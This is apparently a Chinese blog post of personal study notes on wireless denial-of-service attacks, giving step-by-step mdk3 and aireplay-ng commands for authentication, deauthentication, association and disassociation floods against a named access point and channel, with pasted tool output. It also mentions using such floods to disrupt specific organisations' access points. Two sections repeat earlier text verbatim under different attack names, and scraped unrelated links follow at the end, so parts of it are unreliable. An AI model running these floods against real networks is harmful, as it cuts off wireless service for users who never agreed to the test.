常见无线DOS攻击
记录下自己最近一段时间对无线渗透学习的笔记。
无线DOS就是无线拒绝服务攻击。主要包括以下几种攻击类型:Auth Dos攻击、Deauth Flood攻击、Disassociate攻击及RF干扰攻击等。
无线DOS工具:MDK3、Charon(MDK3图形界面)、aireplay-ng
无线客户端状态:IEEE 802.11定义了一种客户端状态机制,用于跟踪工作站身份验证和关联状态。

一、Auth Flood攻击
Auth Flood攻击:即身份验证洪水攻击。该攻击目标主要针对那些处于通过验证、和AP建立关联的关联客户端,攻击者将向AP发送大量伪造的身份验证请求帧(伪造的身份验证服务和状态代码),当收到大量伪造的身份验证请求超过所能承受的能力时,AP将断开其他无线服务连接
攻击步骤:
1 使用airodump-ng wlan0mon 查看当前无线网络状况
2 mdk3 wlan0mon a -a D8:15:0D:2D:CB:58 [-s]
其中:
a:表示的是authentication DOS模式
-a:攻击指定的AP,此处输入的是AP的MAC地址
-s:发送数据包速率
当攻击成功后,指定的AP会有很多的不存在的无线站点与之联系。
1 airodump-ng wlan0mon命令窗口
结果如下:
CH ][ Elapsed: mins ][ -- : BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID D8::0D:2D:CB: - 54e. WPA2 CCMP PSK 2DCB58 BSSID STATION PWR Rate Lost Frames Probe D8::0D:2D:CB: F8:F2:BC:C6::5D - D8::0D:2D:CB: F3::CE:5E:A1:8A - D8::0D:2D:CB: BC:1A:0E:BD:3F:D1 - D8::0D:2D:CB: :5B:DC:7C:DE:9F - D8::0D:2D:CB: A7::EC:CF:2B:5C - D8::0D:2D:CB: AA::1B:::C5 - D8::0D:2D:CB: :EF:9B::A9: - D8::0D:2D:CB: AE:C1:8E:C0:B6: - D8::0D:2D:CB: :3C:B5:5D:E1: - D8::0D:2D:CB: C9::8B:1A:8F:7E - D8::0D:2D:CB: D9:A3::0F:F2: - D8::0D:2D:CB: :C5:::A8:5E - D8::0D:2D:CB: :EB:6C::: -
2 mdk3 wlan0mon a -a D8:15:0D:2D:CB:58 命令窗口如下:
Device is still responding with clients connected! AP D8::0D:2D:CB: seems to be INVULNERABLE! Device is still responding with clients connected! Connecting Client: F8:3B:::E8:AF to target AP: D8::0D:2D:CB: AP D8::0D:2D:CB: seems to be INVULNERABLE! Device is still responding with clients connected! AP D8::0D:2D:CB: seems to be INVULNERABLE! Device is still responding with clients connected! Connecting Client: 5E::C2:3A:: to target AP: D8::0D:2D:CB: AP D8::0D:2D:CB: seems to be INVULNERABLE! Device is still responding with clients connected! AP D8::0D:2D:CB: seems to be INVULNERABLE! Device is still responding with clients connected! Connecting Client: 8D:BC:1B:E5::C7 to target AP: D8::0D:2D:CB: AP D8::0D:2D:CB: seems to be INVULNERABLE! Device is still responding with clients connected! AP D8::0D:2D:CB: seems to be INVULNERABLE!
3 抓包查看无线流量情况

二、Deauth Flood攻击
Deauth Flood攻击即为取消验证洪水攻击,它旨在通过欺骗从AP到客户端单播地址的取消身份验证帧来将客户端转为未关联/未认证的状态。对于目前的工具来说,这种形式的攻击在打断客户无线服务方面非常有效和快捷。一般来说,在攻击者发送另一个取消身份验证帧之前,客户端会重新关联和认证以再次获取服务。攻击者反复欺骗取消身份验证帧才能使所有客户端持续拒绝服务。
攻击步骤:
1 使用airodump-ng wlan0mon来查看当前无线网络状况
2 mdk3 wlan0mon d -c 1[,6,11] [-w file1 -b file2] 或也可以使用aireplay-ng -0 0来完成deauth 攻击
其中:
d:表示的是deauthentication/disassociation攻击模式
-c:针对的是无线网络工作频道,这里选择为1
-w:file白名单模式,w就是白名单的简写,即后跟文件中包含AP的MAC会在攻击中回避
-b:file黑名单模式,b就是黑名单的简写,即后跟预攻击目标AP的MAC列表
攻击成功后,所属信道的AP的客户端会断开连接
1 airodump-ng wlan0mon 命令窗口,结果如下:
CH ][ Elapsed: mins ][ -- : BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID D8::0D:2D:CB: - 54e. WPA2 CCMP PSK 2DCB58 BSSID STATION PWR Rate Lost Frames Probe D8::0D:2D:CB: FF:FF:FF:FF:FF:FF - D8::0D:2D:CB: ::C0:A9:E2:A6 1e- D8::0D:2D:CB: 5C:E0:C5:1A::C9 - - 1e D8::0D:2D:CB: :5A::2F::A0 - 0e- 1e
2 mdk3 wlan0mon d -c 11
Disconnecting between: :5A::2F::A0 and: D8::0D:2D:CB: Disconnecting between: FF:FF:FF:FF:FF:FF and: E4:F3:F5::0C:A0 on channel: Disconnecting between: :5A::2F::A0 and: D8::0D:2D:CB: on channel: Disconnecting between: :5A::2F::A0 and: D8::0D:2D:CB: on channel: Disconnecting between: FF:FF:FF:FF:FF:FF and: E4:F3:F5::0C:A0 on channel: Disconnecting between: :5A::2F::A0 and: D8::0D:2D:CB: on channel: Disconnecting between: :5A::2F::A0 and: D8::0D:2D:CB: on channel:
3 抓包查看无线流量情况

三、Association Flood攻击
Association Flood攻击即为关联洪水攻击。在无线路由器或者接入点内置一个列表即为连接状态表,里面可显示出所有与该AP建立连接的无线客户端状态。它试图通过利用大量模仿和伪造的无线客户端关联来填充AP的客户端关联表,从而达到淹没AP的目的。
由于开放身份验证(空身份验证)允许任何客户端通过身份验证后关联。利用这种漏洞的攻击者可以通过创建多个到达已连接或已关联的客户端来模仿很多客户端,从而淹没目标AP的客户端关联表。
攻击步骤:
1 使用airodump-ng wlan0mon 查看当前无线网络状况
2 mdk3 wlan0mon a -a D8:15:0D:2D:CB:58 [-s]
其中:
a:表示的是authentication DOS模式
-a:攻击指定的AP,此处输入的是AP的MAC地址
-s:发送数据包速率
当攻击成功后,指定的AP会有很多的不存在的无线站点与之联系。
1 airodump-ng wlan0mon命令窗口
结果如下
CH ][ Elapsed: mins ][ -- : BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID D8::0D:2D:CB: - 54e. WPA2 CCMP PSK 2DCB58 BSSID STATION PWR Rate Lost Frames Probe D8::0D:2D:CB: F8:F2:BC:C6::5D - D8::0D:2D:CB: F3::CE:5E:A1:8A - D8::0D:2D:CB: BC:1A:0E:BD:3F:D1 - D8::0D:2D:CB: :5B:DC:7C:DE:9F - D8::0D:2D:CB: A7::EC:CF:2B:5C - D8::0D:2D:CB: AA::1B:::C5 - D8::0D:2D:CB: :EF:9B::A9: - D8::0D:2D:CB: AE:C1:8E:C0:B6: - D8::0D:2D:CB: :3C:B5:5D:E1: - D8::0D:2D:CB: C9::8B:1A:8F:7E - D8::0D:2D:CB: D9:A3::0F:F2: - D8::0D:2D:CB: :C5:::A8:5E - D8::0D:2D:CB: :EB:6C::: -
2 mdk3 wlan0mon a -a D8:15:0D:2D:CB:58 命令窗口如下:
Device is still responding with clients connected! AP D8::0D:2D:CB: seems to be INVULNERABLE! Device is still responding with clients connected! Connecting Client: F8:3B:::E8:AF to target AP: D8::0D:2D:CB: AP D8::0D:2D:CB: seems to be INVULNERABLE! Device is still responding with clients connected! AP D8::0D:2D:CB: seems to be INVULNERABLE! Device is still responding with clients connected! Connecting Client: 5E::C2:3A:: to target AP: D8::0D:2D:CB: AP D8::0D:2D:CB: seems to be INVULNERABLE! Device is still responding with clients connected! AP D8::0D:2D:CB: seems to be INVULNERABLE! Device is still responding with clients connected! Connecting Client: 8D:BC:1B:E5::C7 to target AP: D8::0D:2D:CB: AP D8::0D:2D:CB: seems to be INVULNERABLE! Device is still responding with clients connected! AP D8::0D:2D:CB: seems to be INVULNERABLE!
3 抓包查看无线流量情况

另外一种攻击模式就是攻击者集合了大量的无线网卡,或者是改装的集合大量无线网卡芯片的捆绑式发射机(类似于常说的“短信群发器”),如果进行大规模连接攻击,对于目前广泛使用的无线接入设备,也是很有效果的。
四、Disassociation Flood攻击
Disassociation Flood攻击即为取消关联洪水攻击,和deauthenticaiton flood攻击表现方式很相似。它通过欺骗从AP到客户端的取消关联帧来强制客户端成为未关联/未认证的状态。一般来说,在攻击者发送另一个取消关联帧之前,客户端会重新关联以再次获取服务。攻击者反复欺骗取消关联帧才能使客户端持续拒绝服务。
Disassociation Broadcast攻击和Disassociation Flood攻击原理基本一致,只是在发送程度及使用工具上有所区别,前者很多时候用于配合进行无线中间人攻击,而后者常用于目标确定的点对点无线DOS,比如破坏或干扰指定机构或部门的无线接入点等。
攻击步骤:
1 使用airodump-ng wlan0mon来查看当前无线网络状况
2 mdk3 wlan0mon d -c 1[,6,11] [-w file1 -b file2]
其中:
d:表示的是deauthentication/disassociation攻击模式
-c:针对的是无线网络工作频道,这里选择为1
-w:file白名单模式,w就是白名单的简写,即后跟文件中包含AP的MAC会在攻击中回避
-b:file黑名单模式,b就是黑名单的简写,即后跟预攻击目标AP的MAC列表
攻击成功后,所属信道的AP的客户端会断开连接
1 airodump-ng wlan0mon 命令窗口,结果如下:
CH ][ Elapsed: mins ][ -- : BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID D8::0D:2D:CB: - 54e. WPA2 CCMP PSK 2DCB58 BSSID STATION PWR Rate Lost Frames Probe D8::0D:2D:CB: FF:FF:FF:FF:FF:FF - D8::0D:2D:CB: ::C0:A9:E2:A6 1e- D8::0D:2D:CB: 5C:E0:C5:1A::C9 - - 1e D8::0D:2D:CB: :5A::2F::A0 - 0e- 1e
2 mdk3 wlan0mon d -c 11
Disconnecting between: :5A::2F::A0 and: D8::0D:2D:CB: Disconnecting between: FF:FF:FF:FF:FF:FF and: E4:F3:F5::0C:A0 on channel: Disconnecting between: :5A::2F::A0 and: D8::0D:2D:CB: on channel: Disconnecting between: :5A::2F::A0 and: D8::0D:2D:CB: on channel: Disconnecting between: FF:FF:FF:FF:FF:FF and: E4:F3:F5::0C:A0 on channel: Disconnecting between: :5A::2F::A0 and: D8::0D:2D:CB: on channel: Disconnecting between: :5A::2F::A0 and: D8::0D:2D:CB: on channel:
3 抓包查看无线流量情况

五、RF Jamming攻击
RF Jamming攻击即为RF干扰攻击。该攻击是通过发出干扰射频达到破坏正常无线通信的目的。而前面几种攻击主要是基于无线通信过程及协议的。RF为射频,主要包括无线信号发射机及收信机等。
这里因环境限制身旁没有测试设备,所以具体的数据包无法展示,后面有机会再单独展开。
常见无线DOS攻击的更多相关文章
- 无线DOS攻击
1.无线连接状态 IEEE 802.11定义了一种客户端状态机制,用于跟踪工作站身份验证和关联状态.无线客户端和AP基于IEEE标准实现这种状态机制.成功关联的客户站停留在状态3,才能进行无线通信.处 ...
- 几种常见的DoS攻击
DoS为Denial of Service的简称,意思是拒绝服务.DoS攻击是一种使被攻击者无法正常提供服务的攻击.常见的攻击方式有以下几种类型: LAND Local Area Network ...
- Linux下的DOS攻击
Linux下的DOS攻击 DOS是Denial of service的简称,即拒绝服务,造成Dos攻击行为被称为Dos攻击,其目的是使计算机或网络无法提供正常的服务.最常见的Dos攻击有计算机带宽攻击 ...
- DOS攻击和DDOS攻击有啥区别啊
DDOS是DOS攻击中的一种方法. DoS:是Denial of Service的简称,即拒绝服务,不是DOS操作系统,造成DoS的攻击行为被称为DoS攻击,其目的是使计算机或网络无法提供正常的服务. ...
- dos攻击
概念理解 DoS到底是什么?接触PC机较早的同志会直接想到微软磁盘操作系统的DOS--DiskOperationSystem?不,此DoS非彼DOS也,DoS即DenialOfService,拒绝服务 ...
- DOS攻击之详解--转载
源地址没有找到,间接引用地址:http://wushank.blog.51cto.com/3489095/1156004 DoS到底是什么?接触PC机较早的同志会直接想到微软磁盘操作系统的DOS--D ...
- web攻击之四:DOS攻击
DDOS是DOS攻击中的一种方法. DoS:是Denial of Service的简称,即拒绝服务,不是DOS操作系统,造成DoS的攻击行为被称为DoS攻击,其目的是使计算机或网络无法提供正常的服务. ...
- Web常见几种攻击与预防方式
DoS和DDoS攻击 DoS(Denial of Service),即拒绝服务,造成远程服务器拒绝服务的行为被称为DoS攻击.其目的是使计算机或网络无法提供正常的服务.最常见的DoS攻击有计算机网络带 ...
- 【网络安全】Dos攻击科普文
目录 DOS攻击 什么是DOS攻击 攻击手段分类 具体的攻击方式举例 优秀博客参考 DDOS攻击 DOS攻击 什么是DOS攻击 DOS是Denial of Service的简称,用中文简单翻译就是拒绝 ...
随机推荐
- pycharm配置appium 提示unsrsloved reference
1.如:进入C:\Users\Administrator\PycharmProjects\project\venv 输入:在cmd 下进入 venv 输入 Scripts\activate 回车 ...
- 『MXNet』第十二弹_再谈新建计算节点
上一节我们已经谈到了计算节点,但是即使是官方文档介绍里面相关内容也过于简略,我们使用Faster-RCNN代码中的新建节点为例,重新介绍一下新建节点的调用栈. 1.调用新建节点 参数分为三部分,op_ ...
- HDU - 4436sam裸题
题意:给你多个数字串,求本质不同的子串和(去掉前导零) 题解:建广义sam,刚开始一直想的是用l来计算,发现前导零对l的影响根本消不掉,所以不会做= =,原来应该是直接用一个新的数组表示到当前有多少个 ...
- C# 3.0 / C# 3.5 Lambda 表达式
概述 Lambda 表达式的本质就是匿名函数.(而匿名方法的本质是委托) “Lambda 表达式”是一个匿名函数,可以包含表达式和语句,并且可用于创建委托或表达式树类型. (Lambda 表达式的运算 ...
- 改写了禁用或启用oracle数据库的约束的存储过程
改写了网上某位大侠(最开始的源头是哪位没记住)写的禁用或启用oracle数据库所有约束的存储过程,增加了异常控制,以使发生异常时也可以执行下去. –调用过程: 执行前先 set serveroutpu ...
- noip2013转圈游戏
题目描述 n个小伙伴(编号从 0到 n−1)围坐一圈玩游戏.按照顺时针方向给 n个位置编号,从0 到 n−1.最初,第 0号小伙伴在第 0号位置,第 1号小伙伴在第 1 号位置,……,依此类推. 游戏 ...
- PHP指针相关函数
1.each each — 返回数组中当前的键/值对并将数组指针向前移动一步 $arr = array("one", "two", "three&qu ...
- ActiveMQ 的线程池
ActiveMQ 的线程池实质上也是 ThreadPoolExecutor,不过它的任务模型有自己的特点,我们先看一个例子: public static void main(String[] args ...
- Linux确认网口对应配置文件
服务器经常是多网卡多网口,我们在某个网口插上网线后,到/etc/sysconfig/network-scripts/下配置ip时需要确定插上网线的网口对应的是哪个配置文件(比如是eth0还是eth1) ...
- Spring Boot + Spring Cloud 实现权限管理系统 后端篇(十一):集成 Shiro 框架
Apache Shiro 优势特点 它是一个功能强大.灵活的,优秀开源的安全框架. 它可以处理身份验证.授权.企业会话管理和加密. 它易于使用和理解,相比Spring Security入门门槛低. 主 ...